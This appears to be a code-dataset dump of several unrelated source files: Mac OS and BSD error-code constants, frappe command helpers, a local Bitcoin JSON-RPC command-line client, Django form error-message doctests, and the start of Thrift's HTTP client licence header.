midiTooManyPortsErr = -252 #too many ports already installed in the system
midiNoPortErr = -251 #no port with that ID found
midiNoClientErr = -250 #no client with that ID found
badInputText = -247 #badInputText
badDictFormat = -246 #badDictFormat
incompatibleVoice = -245 #incompatibleVoice
voiceNotFound = -244 #voiceNotFound
bufTooSmall = -243 #bufTooSmall
synthNotReady = -242 #synthNotReady
synthOpenFailed = -241 #synthOpenFailed
noSynthFound = -240 #noSynthFound
siUnknownQuality = -232 #invalid quality selector (returned by driver)
siUnknownInfoType = -231 #invalid info type selector (returned by driver)
siInputDeviceErr = -230 #input device hardware failure
siBadRefNum = -229 #invalid input device reference number
siBadDeviceName = -228 #input device could not be opened
siDeviceBusyErr = -227 #input device already in use
siInvalidSampleSize = -226 #invalid sample size
siInvalidSampleRate = -225 #invalid sample rate
siHardDriveTooSlow = -224 #hard drive too slow to record to disk
siInvalidCompression = -223 #invalid compression type
siNoBufferSpecified = -222 #returned by synchronous SPBRecord if nil buffer passed
siBadSoundInDevice = -221 #invalid index passed to SoundInGetIndexedDevice
siNoSoundInHardware = -220 #no Sound Input hardware
siVBRCompressionNotSupported = -213 #vbr audio compression not supported for this operation
noMoreRealTime = -212 #not enough CPU cycles left to add another task
channelNotBusy = -211 #channelNotBusy
buffersTooSmall = -210 #can not operate in the memory allowed
channelBusy = -209 #the Channel is being used for a PFD already
badFileFormat = -208 #was not type AIFF or was of bad format,corrupt
notEnoughBufferSpace = -207 #could not allocate enough memory
badFormat = -206 #Sound Manager Error Returns
badChannel = -205 #Sound Manager Error Returns
resProblem = -204 #Sound Manager Error Returns
queueFull = -203 #Sound Manager Error Returns
notEnoughHardwareErr = -201 #Sound Manager Error Returns
noHardwareErr = -200 #Sound Manager Error Returns
mapReadErr = -199 #map inconsistent with operation
resAttrErr = -198 #attribute inconsistent with operation
rmvRefFailed = -197 #RmveReference failed
rmvResFailed = -196 #RmveResource failed
addRefFailed = -195 #AddReference failed
addResFailed = -194 #AddResource failed
resFNotFound = -193 #Resource file not found
resNotFound = -192 #Resource not found
inputOutOfBounds = -190 #Offset of Count out of bounds
writingPastEnd = -189 #Writing past end of file
resourceInMemory = -188 #Resource already in memory
CantDecompress = -186 #resource bent ("the bends") - can't decompress a compressed resource
badExtResource = -185 #extended resource has a bad format.
cmNoCurrentProfile = -182 #Responder error
cmUnsupportedDataType = -181 #Responder error
cmCantDeleteProfile = -180 #Responder error
cmCantXYZ = -179 #CMM cant handle XYZ space
cmCantConcatenateError = -178 #Profile can't be concatenated
cmProfilesIdentical = -177 #Profiles the same
cmProfileNotFound = -176 #Responder error
cmMethodNotFound = -175 #CMM not present
cmMethodError = -171 #cmMethodError
cmProfileError = -170 #cmProfileError
cDepthErr = -157 #invalid pixel depth
cResErr = -156 #invalid resolution for MakeITable
cDevErr = -155 #invalid type of graphics device
cProtectErr = -154 #colorTable entry protection violation
cRangeErr = -153 #range error on colorTable request
cNoMemErr = -152 #failed to allocate memory for structure
cTempMemErr = -151 #failed to allocate memory for temporary structures
cMatchErr = -150 #Color2Index failed to find an index
insufficientStackErr = -149 #insufficientStackErr
pixMapTooDeepErr = -148 #pixMapTooDeepErr
rgnOverflowErr = -147 #rgnOverflowErr
noMemForPictPlaybackErr = -145 #noMemForPictPlaybackErr
userCanceledErr = -128 #userCanceledErr
hMenuFindErr = -127 #could not find HMenu's parent in MenuKey (wrong error code - obsolete)
mBarNFnd = -126 #system error code for MBDF not found
updPixMemErr = -125 #insufficient memory to update a pixmap
volGoneErr = -124 #Server volume has been disconnected.
wrgVolTypErr = -123 #Wrong volume type error [operation not supported for MFS]
badMovErr = -122 #Move into offspring error
tmwdoErr = -121 #No free WDCB available
dirNFErr = -120 #Directory not found
memLockedErr = -117 #trying to move a locked block (MoveHHi)
memSCErr = -116 #Size Check failed
memBCErr = -115 #Block Check failed
memPCErr = -114 #Pointer Check failed
memAZErr = -113 #Address in zone check failed
memPurErr = -112 #trying to purge a locked or non-purgeable block
memWZErr = -111 #WhichZone failed (applied to free block)
memAdrErr = -110 #address was odd; or out of range
nilHandleErr = -109 #Master Pointer was NIL in HandleZone or other
memFullErr = -108 #Not enough room in heap zone
noTypeErr = -102 #No object of that type in scrap
noScrapErr = -100 #No scrap exists error
memROZWarn = -99 #soft error in ROZ
portNotCf = -98 #driver Open error code (parameter RAM not configured for this connection)
portInUse = -97 #driver Open error code (port is in use)
portNotPwr = -96 #serial port not currently powered
excessCollsns = -95 #excessive collisions on write
lapProtErr = -94 #error in attaching/detaching protocol
noBridgeErr = -93 #no network bridge for non-local send
eLenErr = -92 #Length error ddpLenErr
eMultiErr = -91 #Multicast address error ddpSktErr
breakRecd = -90 #Break received (SCC)
rcvrErr = -89 #SCC receiver error (framing; parity; OR)
prInitErr = -88 #InitUtil found the parameter ram uninitialized
prWrErr = -87 #parameter ram written didn't read-verify
clkWrErr = -86 #time written did not verify
clkRdErr = -85 #unable to read same clock value twice
verErr = -84 #track failed to verify
fmt2Err = -83 #can't get enough sync
fmt1Err = -82 #can't find sector 0 after track format
sectNFErr = -81 #sector number never found on a track
seekErr = -80 #track number wrong on address mark
spdAdjErr = -79 #unable to correctly adjust disk speed
twoSideErr = -78 #tried to read 2nd side on a 1-sided drive
initIWMErr = -77 #unable to initialize IWM
tk0BadErr = -76 #track 0 detect doesn't change
cantStepErr = -75 #step handshake failed
wrUnderrun = -74 #write underrun occurred
badDBtSlp = -73 #bad data mark bit slip nibbles
badDCksum = -72 #bad data mark checksum
noDtaMkErr = -71 #couldn't find a data mark header
badBtSlpErr = -70 #bad addr mark bit slip nibbles
badCksmErr = -69 #addr mark checksum didn't check
dataVerErr = -68 #read verify compare failed
noAdrMkErr = -67 #couldn't find valid addr mark
noNybErr = -66 #couldn't find 5 nybbles in 200 tries
offLinErr = -65 #r/w requested for an off-line drive
fontDecError = -64 #error during font declaration
wrPermErr = -61 #write permissions error
badMDBErr = -60 #bad master directory block
fsRnErr = -59 #file system internal error:during rename the old entry was deleted but could not be restored.
extFSErr = -58 #volume in question belongs to an external fs
noMacDskErr = -57 #not a mac diskette (sig bytes are wrong)
nsDrvErr = -56 #no such drive (tried to mount a bad drive num)
volOnLinErr = -55 #drive volume already on-line at MountVol
permErr = -54 #permissions error (on file open)
volOffLinErr = -53 #volume not on line error (was Ejected)
gfpErr = -52 #get file position error
rfNumErr = -51 #refnum error
paramErr = -50 #error in user parameter list
opWrErr = -49 #file already open with with write permission
dupFNErr = -48 #duplicate filename (rename)
fBsyErr = -47 #File is busy (delete)
vLckdErr = -46 #volume is locked
fLckdErr = -45 #file is locked
wPrErr = -44 #diskette is write protected.
fnfErr = -43 #File not found
tmfoErr = -42 #too many files open
mFulErr = -41 #memory full (open) or file won't fit (load)
posErr = -40 #tried to position to before start of file (r/w)
eofErr = -39 #End of file
fnOpnErr = -38 #File not open
bdNamErr = -37 #there may be no bad names in the final system!
ioErr = -36 #I/O error (bummers)
nsvErr = -35 #no such volume
dskFulErr = -34 #disk full
dirFulErr = -33 #Directory full
dceExtErr = -30 #dce extension error
unitTblFullErr = -29 #unit table has no more entries
notOpenErr = -28 #Couldn't rd/wr/ctl/sts cause driver not opened
iIOAbortErr = -27 #IO abort error (Printing Manager)
dInstErr = -26 #DrvrInstall couldn't find driver in resources
dRemovErr = -25 #tried to remove an open driver
closErr = -24 #I/O System Errors
openErr = -23 #I/O System Errors
unitEmptyErr = -22 #I/O System Errors
badUnitErr = -21 #I/O System Errors
writErr = -20 #I/O System Errors
readErr = -19 #I/O System Errors
statusErr = -18 #I/O System Errors
controlErr = -17 #I/O System Errors
dsExtensionsDisabled = -13 #say Extensions Disabled
dsHD20Installed = -12 #say HD20 Startup
dsDisassemblerInstalled = -11 #say Disassembler Installed
dsMacsBugInstalled = -10 #say MacsBug Installed
seNoDB = -8 #no debugger installed to handle debugger command
SlpTypeErr = -5 #invalid queue element
unimpErr = -4 #unimplemented core routine
corErr = -3 #core routine number out of range
dsNoExtsDisassembler = -2 #not a SysErr, just a placeholder
qErr = -1 #queue element not found during deletion
tsmComponentNoErr = 0 #component result = no error
EPERM = 1 #Operation not permitted
ENOENT = 2 #No such file or directory
ESRCH = 3 #No such process
EINTR = 4 #Interrupted system call
EIO = 5 #Input/output error
ENXIO = 6 #Device not configured
E2BIG = 7 #Argument list too long
ENOEXEC = 8 #Exec format error
EBADF = 9 #Bad file descriptor
ECHILD = 10 #No child processes
EDEADLK = 11 #Resource deadlock avoided
ENOMEM = 12 #Cannot allocate memory
EACCES = 13 #Permission denied
EFAULT = 14 #Bad address
ECANCELED = 15 #Operation cancelled
EBUSY = 16 #Device busy
EEXIST = 17 #File exists
EXDEV = 18 #Cross-device link
ENODEV = 19 #Operation not supported by device
ENOTDIR = 20 #Not a directory
EISDIR = 21 #Is a directory
EINVAL = 22 #Invalid argument
ENFILE = 23 #Too many open files in system
EMFILE = 24 #Too many open files
ENOTTY = 25 #Inappropriate ioctl for device
ESIGPARM = 26 #Signal error
EFBIG = 27 #File too large
ENOSPC = 28 #No space left on device
ESPIPE = 29 #Illegal seek
EROFS = 30 #Read-only file system
EMLINK = 31 #Too many links
EPIPE = 32 #Broken pipe
EDOM = 33 #Numerical argument out of domain
ERANGE = 34 #Result too large
EAGAIN = 35 #Resource temporarily unavailable
EINPROGRESS = 36 #Operation now in progress
EALREADY = 37 #Operation already in progress
ENOTSOCK = 38 #Socket operation on non-socket
EDESTADDRREQ = 39 #Destination address required
EMSGSIZE = 40 #Message too long
EPROTOTYPE = 41 #Protocol wrong type for socket
ENOPROTOOPT = 42 #Protocol not available
EPROTONOSUPPORT = 43 #Protocol not supported
ESOCKTNOSUPPORT = 44 #Socket type not supported
EOPNOTSUPP = 45 #Operation not supported
EPFNOSUPPORT = 46 #Protocol family not supported
EAFNOSUPPORT = 47 #Address family not supported by protocol family
EADDRINUSE = 48 #Address already in use
EADDRNOTAVAIL = 49 #Can't assign requested address
ENETDOWN = 50 #Network is down
ENETUNREACH = 51 #Network is unreachable
ENETRESET = 52 #Network dropped connection on reset
ECONNABORTED = 53 #Software caused connection abort
ECONNRESET = 54 #Connection reset by peer
ENOBUFS = 55 #No buffer space available
EISCONN = 56 #Socket is already connected
ENOTCONN = 57 #Socket is not connected
ESHUTDOWN = 58 #Can't send after socket shutdown
ETOOMANYREFS = 59 #Too many references: can't splice
ETIMEDOUT = 60 #Operation timed out
ECONNREFUSED = 61 #Connection refused
ELOOP = 62 #Too many levels of symbolic links
ENAMETOOLONG = 63 #File name too long
EHOSTDOWN = 64 #Host is down
EHOSTUNREACH = 65 #No route to host
ENOTEMPTY = 66 #Directory not empty
ELOOK = 67 #Internal mapping for kOTLookErr, don't return to client
ENOLCK = 77 #No locks available
ENOSYS = 78 #Function not implemented
EILSEQ = 88 #Wide character encoding error
EUNKNOWN = 99 #Unknown error
| bsd-2-clause | -3,738,332,965,554,184,000 | 61.822294 | 161 | 0.751734 | false |
yashodhank/frappe | frappe/commands/__init__.py | 10 | 1452 | # Copyright (c) 2015, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, absolute_import
import sys
import click
import cProfile
import StringIO
import pstats
import frappe
import frappe.utils
from functools import wraps
click.disable_unicode_literals_warning = True
def pass_context(f):
@wraps(f)
def _func(ctx, *args, **kwargs):
profile = ctx.obj['profile']
if profile:
pr = cProfile.Profile()
pr.enable()
ret = f(frappe._dict(ctx.obj), *args, **kwargs)
if profile:
pr.disable()
s = StringIO.StringIO()
ps = pstats.Stats(pr, stream=s)\
.sort_stats('cumtime', 'tottime', 'ncalls')
ps.print_stats()
print s.getvalue()
return ret
return click.pass_context(_func)
def get_site(context):
try:
site = context.sites[0]
return site
except (IndexError, TypeError):
print 'Please specify --site sitename'
sys.exit(1)
def call_command(cmd, context):
return click.Context(cmd, obj=context).forward(cmd)
def get_commands():
# prevent circular imports
from .docs import commands as doc_commands
from .scheduler import commands as scheduler_commands
from .site import commands as site_commands
from .translate import commands as translate_commands
from .utils import commands as utils_commands
return list(set(doc_commands + scheduler_commands + site_commands + translate_commands + utils_commands))
commands = get_commands()
| mit | 8,636,933,234,607,513,000 | 23.610169 | 106 | 0.730028 | false |
erwinsanchez/bitcoinwithkeccak | contrib/bitrpc/bitrpc.py | 84 | 9663 | from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| mit | -2,079,752,377,804,305,700 | 27.673591 | 101 | 0.568457 | false |
titasakgm/brc-stock | openerp/addons/report_geraldo/lib/geraldo/site/newsite/django_1_0/tests/regressiontests/forms/error_messages.py | 13 | 10396 | # -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.core.files.uploadedfile import SimpleUploadedFile
# CharField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = CharField(min_length=5, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 4, MIN LENGTH 5']
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# IntegerField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> f = IntegerField(min_value=5, max_value=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
# FloatField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> f = FloatField(min_value=5, max_value=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
# DecimalField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_value'] = 'MIN VALUE IS %s'
>>> e['max_value'] = 'MAX VALUE IS %s'
>>> e['max_digits'] = 'MAX DIGITS IS %s'
>>> e['max_decimal_places'] = 'MAX DP IS %s'
>>> e['max_whole_digits'] = 'MAX DIGITS BEFORE DP IS %s'
>>> f = DecimalField(min_value=5, max_value=10, error_messages=e)
>>> f2 = DecimalField(max_digits=4, decimal_places=2, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'MIN VALUE IS 5']
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'MAX VALUE IS 10']
>>> f2.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'MAX DIGITS IS 4']
>>> f2.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'MAX DP IS 2']
>>> f2.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'MAX DIGITS BEFORE DP IS 2']
# DateField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = DateField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# TimeField ###################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = TimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# DateTimeField ###############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> f = DateTimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
# RegexField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = RegexField(r'^\d+$', min_length=5, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abcde')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 4, MIN LENGTH 5']
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# EmailField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['min_length'] = 'LENGTH %(length)s, MIN LENGTH %(min)s'
>>> e['max_length'] = 'LENGTH %(length)s, MAX LENGTH %(max)s'
>>> f = EmailField(min_length=8, max_length=10, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abcdefgh')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('[email protected]')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 7, MIN LENGTH 8']
>>> f.clean('[email protected]')
Traceback (most recent call last):
...
ValidationError: [u'LENGTH 11, MAX LENGTH 10']
# FileField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['missing'] = 'MISSING'
>>> e['empty'] = 'EMPTY FILE'
>>> f = FileField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean(SimpleUploadedFile('name', None))
Traceback (most recent call last):
...
ValidationError: [u'EMPTY FILE']
>>> f.clean(SimpleUploadedFile('name', ''))
Traceback (most recent call last):
...
ValidationError: [u'EMPTY FILE']
# URLField ##################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID'
>>> e['invalid_link'] = 'INVALID LINK'
>>> f = URLField(verify_exists=True, error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('abc.c')
Traceback (most recent call last):
...
ValidationError: [u'INVALID']
>>> f.clean('http://www.broken.djangoproject.com')
Traceback (most recent call last):
...
ValidationError: [u'INVALID LINK']
# BooleanField ################################################################
>>> e = {'required': 'REQUIRED'}
>>> f = BooleanField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
# ChoiceField #################################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%(value)s IS INVALID CHOICE'
>>> f = ChoiceField(choices=[('a', 'aye')], error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('b')
Traceback (most recent call last):
...
ValidationError: [u'b IS INVALID CHOICE']
# MultipleChoiceField #########################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%(value)s IS INVALID CHOICE'
>>> e['invalid_list'] = 'NOT A LIST'
>>> f = MultipleChoiceField(choices=[('a', 'aye')], error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('b')
Traceback (most recent call last):
...
ValidationError: [u'NOT A LIST']
>>> f.clean(['b'])
Traceback (most recent call last):
...
ValidationError: [u'b IS INVALID CHOICE']
# SplitDateTimeField ##########################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_date'] = 'INVALID DATE'
>>> e['invalid_time'] = 'INVALID TIME'
>>> f = SplitDateTimeField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean(['a', 'b'])
Traceback (most recent call last):
...
ValidationError: [u'INVALID DATE', u'INVALID TIME']
# IPAddressField ##############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid'] = 'INVALID IP ADDRESS'
>>> f = IPAddressField(error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('127.0.0')
Traceback (most recent call last):
...
ValidationError: [u'INVALID IP ADDRESS']
###############################################################################
# Create choices for the model choice field tests below.
>>> from regressiontests.forms.models import ChoiceModel
>>> ChoiceModel.objects.create(pk=1, name='a')
<ChoiceModel: ChoiceModel object>
>>> ChoiceModel.objects.create(pk=2, name='b')
<ChoiceModel: ChoiceModel object>
>>> ChoiceModel.objects.create(pk=3, name='c')
<ChoiceModel: ChoiceModel object>
# ModelChoiceField ############################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = 'INVALID CHOICE'
>>> f = ModelChoiceField(queryset=ChoiceModel.objects.all(), error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('4')
Traceback (most recent call last):
...
ValidationError: [u'INVALID CHOICE']
# ModelMultipleChoiceField ####################################################
>>> e = {'required': 'REQUIRED'}
>>> e['invalid_choice'] = '%s IS INVALID CHOICE'
>>> e['list'] = 'NOT A LIST OF VALUES'
>>> f = ModelMultipleChoiceField(queryset=ChoiceModel.objects.all(), error_messages=e)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'REQUIRED']
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'NOT A LIST OF VALUES']
>>> f.clean(['4'])
Traceback (most recent call last):
...
ValidationError: [u'4 IS INVALID CHOICE']
"""
| agpl-3.0 | 9,170,946,586,135,136,000 | 27.797784 | 86 | 0.571951 | false |
theyaa/Impala | thirdparty/hive-1.1.0-cdh5.7.0-SNAPSHOT/lib/py/thrift/transport/THttpClient.py | 71 | 2916 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
